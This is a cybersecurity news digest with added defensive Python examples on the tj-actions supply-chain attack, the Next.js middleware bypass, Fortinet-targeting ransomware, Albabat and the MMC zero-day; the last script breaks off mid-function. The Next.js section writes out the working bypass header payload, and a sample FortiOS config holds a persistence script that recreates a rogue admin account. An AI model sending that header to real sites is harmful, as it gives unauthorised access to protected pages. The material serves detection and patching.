CyberSecurity news

FlagThis - #cybersecurity

@itpro.com //
References: Rescana, Wiz Blog | RSS feed, Dan Goodin ...
A supply chain attack has targeted the widely used GitHub Action 'tj-actions/changed-files', leading to the leakage of secrets from numerous repositories. The incident, first reported by StepSecurity, involved the compromise of the action itself, allowing attackers to inject malicious code into the CI workflows of every project that used it. The injected code dumped the memory of the CI runner process, exposing secrets such as API keys and passwords in workflow logs; in public repositories those logs are readable by anyone. The compromised 'tj-actions/changed-files' repository and the GitHub gist hosting the malicious script were taken down to limit further exploitation.

The vulnerability, assigned CVE-2025-30066, affected all versions of 'tj-actions/changed-files' as of March 15, 2025: the attackers retroactively re-pointed the action's existing version tags at a malicious commit, so even workflows pinned to an older tag pulled the malicious code. The commit was forged to appear to come from the Renovate bot, which gave the attackers plausible cover for modifying the action's code. While no exfiltration of secrets to an attacker-controlled server has been observed, the exposure in affected repositories' logs remains a significant risk. Impacted organizations are urged to act immediately to mitigate credential theft and CI pipeline compromise, particularly for public repositories, where secrets printed in workflow logs are publicly accessible.
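
The practical check most write-ups recommend after this incident is to stop referencing actions by mutable tag. The script below is an added example, not code from StepSecurity, Wiz or the tj-actions project: it scans a workflow file for `uses:` lines, reports any third-party action that is not pinned to a full commit SHA, and flags references to the two actions named in this story separately, because a tag pin offered no protection once the tags were moved. The workflow text is constructed for the demo and the 40-hex SHA in it is a placeholder, not a real commit.

```python
import re
from typing import Dict, List

# `uses: owner/repo[/path]@ref`; local actions (./...) and docker:// refs have no
# owner/repo@ref shape and are ignored.
USES_RE = re.compile(
    r"^\s*-?\s*uses:\s*['\"]?([A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+)(/[^@'\"\s]+)?@([^'\"\s#]+)"
)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")

# Actions named in this story; any reference, pinned or not, deserves review
# because the attacker re-pointed existing version tags.
KNOWN_COMPROMISED = {"tj-actions/changed-files", "reviewdog/action-setup"}


def audit_workflow(text: str) -> List[Dict[str, object]]:
    """Return one finding per `uses:` line that is unpinned or names a known-bad action."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if not m:
            continue
        action, ref = m.group(1), m.group(3)
        pinned = bool(FULL_SHA_RE.match(ref))
        if action in KNOWN_COMPROMISED:
            severity = "high"
            reason = "action named in the tj-actions / reviewdog advisories; review and replace"
        elif not pinned:
            severity = "medium"
            reason = f"mutable ref '{ref}' (tag or branch); pin to a full commit SHA"
        else:
            continue
        findings.append({"line": lineno, "action": action, "ref": ref,
                         "severity": severity, "reason": reason})
    return findings


# Constructed sample workflow; the SHA is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: tj-actions/changed-files@v45
      - uses: actions/setup-node@v4
      - uses: ./.github/actions/local-thing
"""

if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {f['line']}: [{f['severity']}] {f['action']}@{f['ref']}: {f['reason']}")
```

Run it over every file under `.github/workflows/` in each repository. SHA pinning is not a complete defence on its own (a pinned commit can still contain a bug, and a pinned dependency still needs updating), but it removes the specific failure mode of this incident, where a tag silently started pointing at attacker-controlled code.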

Recommended read:
References :
  • Rescana: GitHub Actions Security Breach: tj-actions/changed-files-action Supply Chain Vulnerability Analysis
  • Wiz Blog | RSS feed: GitHub Action tj-actions/changed-files supply chain attack: everything you need to know
  • Open Source Security: tj-action/changed-files GitHub action was compromised
  • Dan Goodin: Is anyone following this breach involving the tj-actions/changed-files GitHub Action? Seems pretty major, but I'm still trying to figure out exactly what's going on, who's affected, and what people (and how many) are affected. If you can help me get up to speed please DM me on Signal -- DanArs.82, or on Mastodon
  • securityonline.info: Popular GitHub Action “tj-actions/changed-files” Compromised (CVE-2025-30066)
  • Risky Business Media: Risky Bulletin: GitHub supply chain attack leaks secrets
  • www.itpro.com: Organizations urged to act fast after GitHub Action supply chain attack
  • : Tj-actions Supply Chain Attack Exposes 23,000 Organizations
  • Latio Pulse: Understanding and Re-Creating the tj-actions/changed-files Supply Chain Attack
  • The Register - Security: GitHub supply chain attack spills secrets from 23,000 projects
  • BleepingComputer: Supply chain attack on popular GitHub Action exposes CI/CD secrets
  • www.cybersecuritydive.com: Supply chain attack against GitHub Action triggers massive exposure of secrets
  • Metacurity: A GitHub Action used in 23,000 repos was compromised in a supply chain attack
  • gbhackers.com: Supply Chain Attack Targets 23,000 GitHub Repositories
  • hackread.com: Malicious Code Hits ‘tj-actions/changed-files’ in 23,000 GitHub Repos
  • www.infoworld.com: Thousands of open source projects at risk from hack of GitHub Actions tool
  • bsky.app: Bsky Social - A supply chain attack on the widely used 'tj-actions/changed-files' GitHub Action, used by 23,000 repositories, potentially allowed threat actors to steal CI/CD secrets from GitHub Actions build logs.
  • Wiz Blog | RSS feed: New GitHub Action supply chain attack: reviewdog/action-setup
  • unit42.paloaltonetworks.com: Threat Assessment: GitHub Actions Supply Chain Attack: The Compromise of tj-actions/changed-files
  • Legit Security Blog: Github Actions tj-actions/changed-files Attack
  • Security Risk Advisors: TB2025318 – GitHub Action “tj-actions/changed-files” Compromised to Leak Secrets for Repositories Using the CI/CD Workflow
  • securityaffairs.com: GitHub Action tj-actions/changed-files was compromised in supply chain attack
  • bsky.app: A cascading supply chain attack that began with the compromise of the "reviewdog/action-setup@v1" GitHub Action is believed to have led to the recent breach of "tj-actions/changed-files" that leaked CI/CD secrets.
  • blog.gitguardian.com: Compromised tj-actions/changed-files GitHub Action: A look at publicly leaked secrets
  • Kaspersky official blog: Supply chain attack via GitHub Action | Kaspersky official blog
  • Risky Business Media: Risky Business #784 -- GitHub supply chain attack steals secrets from 23k projects
  • thecyberexpress.com: CISA Warns of Exploited GitHub Action CVE-2025-30066 – Users Urged to Patch
  • The DefendOps Diaries: Understanding the GitHub Action Supply Chain Attack
  • Sam Bent: GitHub Action Vulnerability: Supply Chain Attack Exposes Limited Secrets, Raises Broader Concerns
  • Schneier on Security: Critical GitHub Attack
  • Aembit: GitHub Action tjactions/changed-files Supply Chain Breach Exposes NHI Risks in CI/CD
  • www.cybersecurity-insiders.com: GitHub Supply Chain Attack Raises Awareness Across The Cybersecurity Community
  • tl;dr sec: [tl;dr sec] #271 - Threat Modeling (+ AI), Backdoored GitHub Actions, Compromising a Threat Actor's Telegram

@cyberalerts.io //
A critical vulnerability has been discovered in the widely-used Next.js framework, identified as CVE-2025-29927. This flaw allows attackers to bypass authorization checks within the framework's middleware system. Middleware is commonly used to enforce authentication, authorization, path rewriting, and security-related headers, making this vulnerability particularly severe. Vercel, the company behind Next.js, disclosed the issue on March 21st, 2025, highlighting its potential impact on services relying on vulnerable versions of the framework.

To mitigate the risk, developers running affected releases (Next.js 11.1.4 through 15.2.2) are urged to update to the patched versions: 15.2.3, 14.2.25, 13.5.9, or 12.3.5. For those unable to update immediately, the documented workaround is to block external requests that carry the 'x-middleware-subrequest' header at the edge: the header is meant only for Next.js's own internal subrequests, and a request forged to include it can cause the middleware to be skipped entirely. Some hosting platforms, including Vercel and Netlify, have already deployed this filter for their customers. Because middleware is often the only place an application checks for a valid session, a successful bypass lets an attacker reach pages behind a login screen without credentials, exposing user data and other sensitive information.
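
To make the failure mode concrete, here is an added example (not Next.js code, and not from any of the referenced write-ups) that models the pre-patch decision in Python: the middleware runner consulted a client-controllable header to decide whether it was already inside a middleware subrequest, and skipped the middleware if so. The skip logic below is a simplified reconstruction from public analyses of the fix, the recursion limit of 5 for 15.x is taken from those analyses and is an assumption of this model, and the header values are constructed to match the shape of the published proof of concept. The hardened handler shows the two layers of the mitigation: strip the header at the edge, and do not let middleware be the only place authorization is checked.

```python
from typing import Dict

INTERNAL_HEADER = "x-middleware-subrequest"
# Recursion limit the vulnerable 15.x check compared against
# (value taken from public analyses of the patch; an assumption for this model).
MAX_RECURSION_DEPTH = 5


def middleware_skipped(headers: Dict[str, str], middleware_name: str = "middleware",
                       legacy: bool = False) -> bool:
    """Model of the pre-patch decision: should this request bypass middleware?

    The header is meant for Next.js's own internal subrequests and lists the
    middleware names already traversed, separated by ':'. Older releases skipped
    middleware if its name appeared at all (legacy=True); 15.x counted the
    occurrences and skipped once the count reached MAX_RECURSION_DEPTH. Either
    way the decision trusts a client-supplied header, which is the bug.
    """
    value = headers.get(INTERNAL_HEADER)
    if value is None:
        return False
    names = value.split(":")
    if legacy:
        return middleware_name in names
    return names.count(middleware_name) >= MAX_RECURSION_DEPTH


def handle_request(path: str, headers: Dict[str, str], legacy: bool = False) -> int:
    """Vulnerable pattern: the session check lives only in middleware."""
    if path.startswith("/admin") and not middleware_skipped(headers, legacy=legacy):
        if headers.get("cookie") != "session=valid":
            return 401  # a real app would redirect to /login
    return 200


def strip_internal_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Edge workaround from the advisory: drop the header from external requests."""
    return {k: v for k, v in headers.items() if k.lower() != INTERNAL_HEADER}


def handle_request_hardened(path: str, headers: Dict[str, str], legacy: bool = False) -> int:
    """Defence in depth: strip the header at the edge AND re-check the session in
    the protected route itself, so middleware is not the only gate."""
    headers = strip_internal_headers(headers)
    status = handle_request(path, headers, legacy=legacy)
    if status == 200 and path.startswith("/admin") and headers.get("cookie") != "session=valid":
        return 401
    return status


# Constructed payloads matching the shape of the public proof of concept.
BYPASS_15 = {INTERNAL_HEADER: ":".join(["middleware"] * MAX_RECURSION_DEPTH)}
BYPASS_LEGACY = {INTERNAL_HEADER: "middleware"}

if __name__ == "__main__":
    print("no cookie            ->", handle_request("/admin", {}))
    print("bypass header (15.x) ->", handle_request("/admin", BYPASS_15))
    print("hardened + bypass    ->", handle_request_hardened("/admin", BYPASS_15))
```

The model also explains why the edge filter alone is a workaround rather than a fix: it protects only traffic that passes through the filter, so a self-hosted instance reachable on another path stays exposed until it is upgraded. To check a staging instance, request a protected route with and without an `x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware` header and compare the responses; only test systems you are authorised to test.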

Recommended read:
References :
  • securityonline.info: Urgent: Patch Your Next.js for Authorization Bypass (CVE-2025-29927)
  • Open Source Security: Re: CVE-2025-29927: Authorization Bypass in Next.js Middleware
  • isc.sans.edu: ISC SANS posting on the Next.js vulnerability
  • bsky.app: It is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware.
  • Lobsters: How to find Next.js on your network
  • Strobes Security: When security vulnerabilities appear in popular frameworks, they can affect thousands of websites overnight. That’s exactly what’s happening with a newly discovered Next.js vulnerability, one of the most widely used...
  • securityaffairs.com: Critical Next.js Vulnerability Allows Attackers to Bypass Middleware Authorization Checks
  • Open Source Security: CVE-2025-29927: Authorization Bypass in Next.js Middleware
  • socradar.io: Next.js Middleware Vulnerability (CVE-2025-29927): What You Need to Know and How to Respond
  • thehackernews.com: Critical Next.js Vulnerability Allows Attackers to Bypass Middleware Authorization Checks
  • securityboulevard.com: CVE-2025-29927 – Understanding the Next.js Middleware Vulnerability
  • BleepingComputer: Critical flaw in Next.js lets hackers bypass authorization
  • Help Net Security: Help Net Security reports on the critical Next.js authentication bypass vulnerability.
  • cyberscoop.com: Researchers raise alarm about critical Next.js vulnerability
  • Legit Security Blog: Next.js Vulnerability: What You Need to Know
  • Resources-2: Discovered a critical vulnerability affecting Next.js middleware, tracked as CVE-2025-29927.
  • The DefendOps Diaries: Understanding and mitigating CVE-2025-29927: a critical Next.js vulnerability
  • Developer Tech News: Critical security flaw uncovered in Next.js framework
  • nsfocusglobal.com: Next.js Middleware Permission Bypass Vulnerability (CVE-2025-29927)
  • www.techradar.com: Critical security flaw in Next.js could spell big trouble for JavaScript users
  • infosec.exchange: Critical in NextJS (CVE-2025-29927) impacts all NextJS versions before 15.2.3, 14.2.25, 13.5.9, 12.3.5 allowing attackers to bypass authorisation checks. Great explanation and a Proof-of-Concept demonstration by @_JohnHammond 👇
  • SOC Prime Blog: CVE-2025-29927 Next.js Middleware Authorization Bypass Vulnerability
  • Kali Linux Tutorials: CVE-2025-29927 : Next.js Middleware Authorization Bypass – Technical Analysis
  • DEVCLASS: Next.js team fixes vuln that allows authorization bypass when middleware is used, revises documentation recommending this method
  • Rescana: Executive Summary: The discovery of CVE-2025-29927, a critical vulnerability in Next.js, has raised significant cybersecurity concerns...
  • Stormshield: A critical authentication bypass vulnerability impacting the Next.js middleware has been reported. It has been assigned the reference CVE-2025-29927 and a CVSS 3.1 score of 9.1. It should be noted that proofs of concept for CVE-2025-29927 are publicly available.
  • Fastly Security Blog: CVE-2025-29927: Authorization Bypass in Next.js
  • hackread.com: Researchers have uncovered a critical vulnerability (CVE-2025-29927) in Next.js middleware, allowing authorization bypass. Learn about the exploit and fixes.

Vasu Jakkal@Microsoft Security Blog //
Microsoft has unveiled a significant expansion of its Security Copilot platform, integrating AI agents designed to automate security operations tasks and alleviate the workload on cybersecurity professionals. This move aims to address the increasing volume and complexity of cyberattacks, which are overwhelming security teams that rely on manual processes. The AI-powered agents will handle routine tasks, freeing up IT and security staff to tackle more complex issues and proactive security measures. Microsoft says it detected over 30 billion phishing emails targeting its customers between January and December 2024, a volume it cites as evidence of the need for automated triage.

The expansion includes eleven AI agents, six developed by Microsoft and five by security partners, set for preview in April 2025. Microsoft's agents include the Phishing Triage Agent in Microsoft Defender, Alert Triage Agents in Microsoft Purview, Conditional Access Optimization Agent in Microsoft Entra, Vulnerability Remediation Agent in Microsoft Intune, and Threat Intelligence Briefing Agent in Security Copilot. These agents are purpose-built for security, designed to learn from feedback, adapt to workflows, and operate securely within Microsoft’s Zero Trust framework, ensuring that security teams retain full control over their actions and responses.

Recommended read:
References :
  • The Register - Software: AI agents swarm Microsoft Security Copilot
  • Microsoft Security Blog: Microsoft unveils Microsoft Security Copilot agents and new protections for AI
  • .NET Blog: Learn how the Xbox services team leveraged .NET Aspire to boost their team's productivity.
  • Ken Yeung: Microsoft’s First CTO Says AI Is ‘Three to Five Miracles’ Away From Human-Level Intelligence
  • SecureWorld News: Microsoft Expands Security Copilot with AI Agents
  • www.zdnet.com: Microsoft's new AI agents aim to help security pros combat the latest threats
  • www.itpro.com: Microsoft launches new security AI agents to help overworked cyber professionals
  • www.techrepublic.com: After Detecting 30B Phishing Attempts, Microsoft Adds Even More AI to Its Security Copilot
  • eSecurity Planet: esecurityplanet.com covers Fortifying Cybersecurity: Agentic Solutions by Microsoft and Partners
  • Microsoft Security Blog: AI innovation requires AI security: Hear what’s new at Microsoft Secure
  • www.csoonline.com: Microsoft has introduced a new set of AI agents for its Security Copilot platform, designed to automate key cybersecurity functions as organizations face increasingly complex and fast-moving digital threats.
  • SiliconANGLE: Microsoft introduces AI agents for Security Copilot
  • SiliconANGLE: Microsoft Corp. is enhancing the capabilities of its popular artificial intelligence-powered Copilot tool with the launch late today of its first “deep reasoning” agents, which can solve complex problems in the way a highly skilled professional might do.
  • Ken Yeung: Microsoft is introducing a new way for developers to create smarter Copilots.
  • Source Asia: Microsoft Security Copilot agents and more security innovations
  • www.computerworld.com: Microsoft’s Newest AI Agents Can Detail How They Reason

@cyberalerts.io //
The FBI has issued a warning about the rising trend of cybercriminals using fake file converter tools to distribute malware. These tools, often advertised as free online document converters, are designed to trick users into downloading malicious software onto their computers. While these tools may perform the advertised file conversion, they also secretly install malware that can lead to identity theft, ransomware attacks, and the compromise of sensitive data.

The threat actors advertise a variety of file converter or downloader tools, enticing users with offers to convert files from one format to another (for example .doc to .pdf) or to merge multiple files. The malicious code, disguised as the conversion utility, can also scrape the uploaded files for personal identifying information such as Social Security numbers, banking details, and cryptocurrency wallet addresses. The FBI advises users to be cautious with such tools and to report any instances of this scam to protect their assets.

The FBI Denver Field Office is warning that they are increasingly seeing scams involving free online document converter tools and encourages victims to report any instances of this scam. Malwarebytes has identified some of these suspect file converters, which include Imageconvertors.com, convertitoremp3.it, convertisseurs-pdf.com and convertscloud.com. The agency emphasized the importance of educating individuals about these threats to prevent them from falling victim to these scams.

Recommended read:
References :
  • Talkback Resources: FBI warns of malware-laden websites posing as free file converters, leading to ransomware attacks and data theft.
  • gbhackers.com: Beware! Malware Hidden in Free Word-to-PDF Converters
  • www.bitdefender.com: Free file converter malware scam “rampant” claims FBI
  • Malwarebytes: Warning over free online file converters that actually install malware
  • bsky.app: Free file converter malware scam "rampant" claims FBI.
  • bsky.app: @bushidotoken.net has dug up some IOCs for the FBI's recent warning about online file format converters being used to distribute malware
  • Help Net Security: FBI: Free file converter sites and tools deliver malware
  • www.techradar.com: Free online file converters could infect your PC with malware, FBI warns
  • Security | TechRepublic: Scam Alert: FBI ‘Increasingly Seeing’ Malware Distributed In Document Converters
  • securityaffairs.com: The FBI warns of a significant increase in scams involving free online document converters to infect users with malware. The FBI warns that threat actors use malicious online document converters to steal users’ sensitive information and infect their systems with malware.
  • The DefendOps Diaries: FBI warns against fake file converters spreading malware and stealing data. Learn how to protect yourself from these cyber threats.
  • PCMag UK security: PSA: Be Careful Around Free File Converters, They Might Contain Malware
  • www.bleepingcomputer.com: FBI warnings are true—fake file converters do push malware
  • www.techradar.com: FBI warns some web-based file management services are not as well-intentioned as they seem.
  • www.csoonline.com: Improvements Microsoft has made to Office document security that disable macros and other embedded malware by default has forced criminals to up their innovation game, a security expert said Monday.
  • www.itpro.com: Fake file converter tools are on the rise – here’s what you need to know
  • Cyber Security News: The FBI Denver Field Office has warned sternly about the rising threat of malicious online file converter tools. These seemingly harmless services, often advertised as free tools to convert or merge files, are being weaponized by cybercriminals to install malware on users’ computers. This malware can have devastating consequences, including ransomware attacks and identity theft. […]

Bill Toulas@BleepingComputer //
A new ransomware campaign is underway that exploits critical vulnerabilities in Fortinet's FortiOS and FortiProxy. The SuperBlack ransomware, deployed by the group tracked as Mora_001, targets Fortinet firewalls through two authentication bypass flaws, CVE-2024-55591 and CVE-2025-24472. Once inside, the attackers escalate to super-admin, create additional administrator accounts, and modify automation tasks so that those accounts are recreated if a defender deletes them.

The two vulnerabilities were disclosed in January and February 2025. After the initial compromise, the attackers map the network and attempt lateral movement using stolen VPN credentials and VPN accounts they have added themselves, and only then encrypt devices. Along the way they use the Windows Management Instrumentation command-line tool (WMIC), SSH, and the TACACS+ and RADIUS protocols that manage and authenticate network access. Organizations are urged to patch their Fortinet systems to mitigate the risk of SuperBlack attacks.
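
For a responder, the first things to check on a FortiGate suspected of Mora_001 activity are the admin table and the automation configuration, since that is where the persistence described above lives. The script below is an added example, not Forescout's or Fortinet's code: it parses a FortiOS configuration backup (the `config ... edit ... set ... next ... end` CLI format) and flags super_admin accounts outside an allowlist plus automation actions whose CLI script manages admin accounts. The configuration text is constructed for the demo; the account and action names in it are illustrative rather than indicators from the report, and the automation script is written on one line for readability rather than in the exact on-device encoding.

```python
import re
from typing import Dict, List, Set

Config = Dict[str, Dict[str, Dict[str, str]]]  # table -> entry -> {key: value}


def parse_fortios_config(text: str) -> Config:
    """Parse top-level `config <table>` blocks of a FortiOS backup into a dict.
    Nested `config` blocks inside an entry (e.g. `config actions`) are skipped,
    which is enough for the tables inspected here."""
    tables: Config = {}
    stack: List[str] = []   # nested `config` names; len 1 == top-level table
    entry = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("config "):
            stack.append(line[len("config "):])
            if len(stack) == 1:
                tables.setdefault(stack[0], {})
        elif line == "end":
            if stack:
                stack.pop()
            if not stack:
                entry = None
        elif len(stack) != 1:
            continue  # inside a nested block: ignore
        elif line.startswith("edit "):
            entry = line[len("edit "):].strip().strip('"')
            tables[stack[0]][entry] = {}
        elif line.startswith("set ") and entry is not None:
            key, _, value = line[len("set "):].partition(" ")
            tables[stack[0]][entry][key] = value.strip().strip('"')
        elif line == "next":
            entry = None
    return tables


# A CLI script that touches any of these is managing administrator accounts.
ADMIN_SCRIPT_RE = re.compile(r"config system admin|accprofile|super_admin", re.IGNORECASE)


def audit(tables: Config, expected_super_admins: Set[str]) -> List[str]:
    """Flag unexpected super_admin accounts and automation actions that (re)create admins."""
    findings: List[str] = []
    for name, attrs in tables.get("system admin", {}).items():
        if attrs.get("accprofile") == "super_admin" and name not in expected_super_admins:
            findings.append(f"unexpected super_admin account: {name}")
    for name, attrs in tables.get("system automation-action", {}).items():
        if attrs.get("action-type") == "cli-script" and ADMIN_SCRIPT_RE.search(attrs.get("script", "")):
            findings.append(f"automation action '{name}' runs a CLI script that manages admin accounts")
    return findings


# Constructed sample resembling a FortiOS backup; names are illustrative only.
SAMPLE_CONFIG = """\
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
    next
    edit "forticloud-sync"
        set accprofile "super_admin"
        set vdom "root"
    next
    edit "readonly-noc"
        set accprofile "prof_admin"
    next
end
config system automation-action
    edit "restore-admin"
        set action-type cli-script
        set script "config system admin edit forticloud-sync set accprofile super_admin next end"
    next
    edit "email-alert"
        set action-type email
    next
end
config system automation-stitch
    edit "daily"
        set trigger "daily-schedule"
        config actions
            edit 1
                set action "restore-admin"
            next
        end
    next
end
"""

if __name__ == "__main__":
    for finding in audit(parse_fortios_config(SAMPLE_CONFIG), {"admin"}):
        print(finding)
```

Run it against a fresh backup rather than one taken before the suspected intrusion, and follow each flagged automation action back to its stitch and trigger (the `system automation-stitch` table is parsed too) so the whole chain is removed, not just the account.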

Recommended read:
References :
  • The DefendOps Diaries: SuperBlack Ransomware: Exploiting Fortinet Vulnerabilities
  • BleepingComputer: New SuperBlack ransomware exploits Fortinet auth bypass flaws
  • Industrial Cyber: Researchers from Forescout Technologies‘ Forescout Research – Vedere Labs identified a series of intrusions exploiting two Fortinet vulnerabilities
  • The Register - Security: New kids on the ransomware block channel Lockbit to raid Fortinet firewalls
  • www.cybersecuritydive.com: SuperBlack ransomware strain used in attacks targeting Fortinet vulnerabilities
  • Blog: Fortinet flaws targeted by new LockBit-like SuperBlack ransomware
  • securityaffairs.com: SuperBlack Ransomware operators exploit Fortinet Firewall flaws in recent attacks
  • www.csoonline.com: Researchers tracked the exploits back to late November/early December last year.
  • techcrunch.com: Hackers are exploiting Fortinet firewall bugs to plant ransomware
  • Security Risk Advisors: New SuperBlack ransomware exploits Fortinet vulnerabilities for network breaches
  • Cyber Security News: CISA Warns: Fortinet FortiOS Vulnerability Actively Exploited
  • gbhackers.com: CISA Issues Security Warning on Fortinet FortiOS Authentication Bypass Exploit
  • securityonline.info: Cybersecurity Alert: CISA Adds Fortinet and GitHub Action Vulnerabilities to Exploited List
  • cyble.com: CISA Alerts Users of CVE-2025-24472
  • securityaffairs.com: U.S. CISA adds Fortinet FortiOS/FortiProxy and GitHub Action flaws to its Known Exploited Vulnerabilities catalog
  • www.it-daily.net: SuperBlack ransomware exploits Fortinet vulnerability
  • : Fortinet Vulnerability Exploited in Ransomware Attack, CISA Warns. The US Cybersecurity and Infrastructure Security Agency added flaws in Fortinet and a popular GitHub Action to its Known Exploited Vulnerabilities catalog.
  • chemical-facility-security-news.blogspot.com: CISA Adds FortiGuard Vulnerability to KEV Catalog – 3-18-25

Nathaniel Morales@feeds.trendmicro.com //
The Albabat ransomware has evolved, now targeting Windows, Linux, and macOS systems, according to recent research. This marks a significant expansion in the group's capabilities, showcasing increased sophistication in exploiting multiple operating systems. Trend Micro researchers uncovered this evolution, noting the ransomware group leverages GitHub to streamline their operations, enhancing the efficiency and reach of their attacks.

Albabat ransomware version 2.0 gathers system and hardware information on Linux and macOS systems and uses a GitHub account to store and deliver its configuration files, letting the operators manage campaigns centrally and push updated tooling efficiently. The repository is private but is reached with an authentication token, and its commit history shows active, ongoing development.

Recent versions retrieve their configuration through the GitHub REST API, identifying themselves with the User-Agent string "Awesome App". The ransomware encrypts files with extensions such as .exe, .dll, .mp3, and .pdf while skipping folders like Searches and AppData, and it terminates processes such as taskmgr.exe and regedit.exe to hinder detection and interference. Infections and payments are tracked in a PostgreSQL database, and the operators may also sell stolen data.
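
The User-Agent string is the cheapest pivot in this story, and it generalises: a workstation talking to the GitHub REST API with a client nobody in the estate uses is worth a look whatever the string says. The scanner below is an added example, not Trend Micro's tooling, and it runs over constructed tab-separated proxy records (timestamp, source IP, method, URL, User-Agent) rather than any real log format. The allowlist of expected GitHub clients is an assumption to be tuned locally.

```python
import re
from typing import Dict, List

ALBABAT_UA = "Awesome App"  # User-Agent reported for Albabat's GitHub API calls

# Clients this estate is expected to use against api.github.com. Assumption:
# adjust to local reality; this is the noisy half of the rule.
EXPECTED_GITHUB_CLIENTS = re.compile(
    r"^(git/|GitHub CLI |Mozilla/|curl/|python-requests/|Go-http-client/|Dependabot)"
)


def host_of(url: str) -> str:
    m = re.match(r"^[a-z]+://([^/:]+)", url)
    return m.group(1).lower() if m else ""


def scan_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Flag the exact Albabat User-Agent anywhere, and any unrecognised client
    querying the GitHub REST API. Records are tab-separated (constructed format)."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) != 5:
            continue  # malformed record; a real pipeline would count these
        ts, src, method, url, ua = fields
        reason = None
        if ua == ALBABAT_UA:
            reason = "User-Agent matches Albabat's 'Awesome App'"
        elif host_of(url) == "api.github.com" and not EXPECTED_GITHUB_CLIENTS.match(ua):
            reason = "unrecognised client querying the GitHub REST API"
        if reason:
            hits.append({"ts": ts, "src": src, "method": method, "url": url,
                         "ua": ua, "reason": reason})
    return hits


# Constructed sample records; hosts other than GitHub's are reserved example names.
SAMPLE_LOG = [
    "2025-03-20T10:01:02Z\t10.0.0.5\tGET\thttps://api.github.com/repos/acct/repo/contents/config.json\tAwesome App",
    "2025-03-20T10:01:09Z\t10.0.0.7\tGET\thttps://api.github.com/repos/org/tool/releases\tgit/2.43.0",
    "2025-03-20T10:02:30Z\t10.0.0.5\tGET\thttps://www.example.invalid/\tAwesome App",
    "2025-03-20T10:03:44Z\t10.0.0.9\tGET\thttps://api.github.com/user\tMyUpdater/1.0",
    "2025-03-20T10:04:01Z\t10.0.0.9\tGET\thttps://github.com/org/tool\tMozilla/5.0",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} {hit['ua']!r} -> {hit['url']} : {hit['reason']}")
```

The first rule will stop matching the moment the operators change the string; the second survives that, at the cost of false positives from legitimate tooling, which is why the allowlist needs maintaining. A hit from a host also merits a look for the embedded GitHub token the text mentions, since revoking that token breaks the configuration delivery channel.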

Recommended read:
References :
  • Cyber Security News: The Albabat ransomware has expanded its operation by utilizing GitHub to streamline its operation.
  • gbhackers.com: The Albabat ransomware group has been observed expanding its operations to target not only Windows but also Linux and macOS systems, marking a significant evolution in its capabilities. They are leveraging GitHub to streamline their ransomware operations.
  • : Trend Micro observed a continuous development of Albabat ransomware, designed to expand attacks and streamline operations. The authors seem to be targeting Linux and macOS systems now.
  • www.trendmicro.com: New versions of Albabat ransomware have been detected that target Windows, Linux, and macOS devices. The group is utilizing GitHub to streamline their operations.
  • hackread.com: New Attacks Exploit Year-Old ServiceNow Flaws – Israel Hit Hardest
  • Carly Page: Mastodon: Hackers are ramping up attempts to exploit a trio of year-old ServiceNow vulnerabilities to break into unpatched company instances
  • techcrunch.com: TechCrunch: Hackers are ramping up attacks using year-old ServiceNow security bugs to break into unpatched systems
  • www.scworld.com: Attacks involving ServiceNow vulnerabilities escalate
  • bsky.app: Albabat Ransomware Group Potentially Expands Targets to Multiple OS, Uses GitHub to Streamline Operations https://buff.ly/IWRowB3
  • Talkback Resources: New Attacks Exploit Year-Old ServiceNow Flaws - Israel Hit Hardest [app] [exp]
  • www.itpro.com: Old ServiceNow vulnerabilities could cause havoc for unpatched customers
  • Rescana: ServiceNow Vulnerabilities: Critical Exploits Impacting Israel and Global Systems
  • Cyber Security News: Albabat Ransomware Adds Linux and macOS to its Expanding List of Targets
  • gbhackers.com: Albabat Ransomware Expands Reach to Target Linux and macOS Platforms
  • www.cysecurity.news: Albabat Ransomware Evolves with Cross-Platform Capabilities and Enhanced Attack Efficiency
  • ciso2ciso.com: New versions of the Albabat ransomware target Windows, Linux, and macOS, and retrieve configuration files from GitHub. The post appeared first on SecurityWeek.

Sergiu Gatlan@BleepingComputer //
EncryptHub, a group linked to RansomHub, has been identified as the actor exploiting a zero-day vulnerability in Microsoft Management Console (MMC). Tracked as CVE-2025-26633, this flaw allows attackers to bypass security features and execute malicious code on vulnerable Windows systems. The vulnerability stems from improper input sanitization within MMC, a core administrative tool. Attackers are leveraging this flaw through email and web-based attacks, delivering malicious payloads to unsuspecting users, bypassing Windows file reputation protections.

The exploit, dubbed 'MSC EvilTwin', manipulates .msc files and the Multilingual User Interface Path (MUIPath) to execute malicious payloads, maintain persistence, and steal sensitive data. Specifically, attackers create two .msc files with the same name, a clean one and a malicious counterpart. When the legitimate file is run, MMC inadvertently picks the rogue file from a directory named "en-US" and executes it, unbeknownst to the user. This sophisticated technique allows EncryptHub to deploy various malware families, including Rhadamanthys and StealC, information stealers which pose a severe risk to affected organizations.
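
The twin-file layout is something a defender can look for directly: a console file that has a same-named .msc sitting in a locale subfolder beside it. The script below is an added example, not Trend Micro's or Microsoft's code, and it does nothing Windows-specific, so it runs anywhere over a copied directory tree. It builds a constructed sample tree in a temporary directory (the file contents are placeholders, not real MMC console XML), reports every console with a locale-folder twin, and notes whether the two files actually differ. The write-ups name the en-US folder; matching other locale folders of the same xx-XX shape is an assumption of this example.

```python
import hashlib
import os
import re
import tempfile
from typing import List, Tuple

# MUI locale folder names (en-US, de-DE, ...). The write-ups name en-US; the
# broader pattern is an assumption that covers other locale folders.
LOCALE_DIR = re.compile(r"^[a-z]{2}-[A-Z]{2}$")


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
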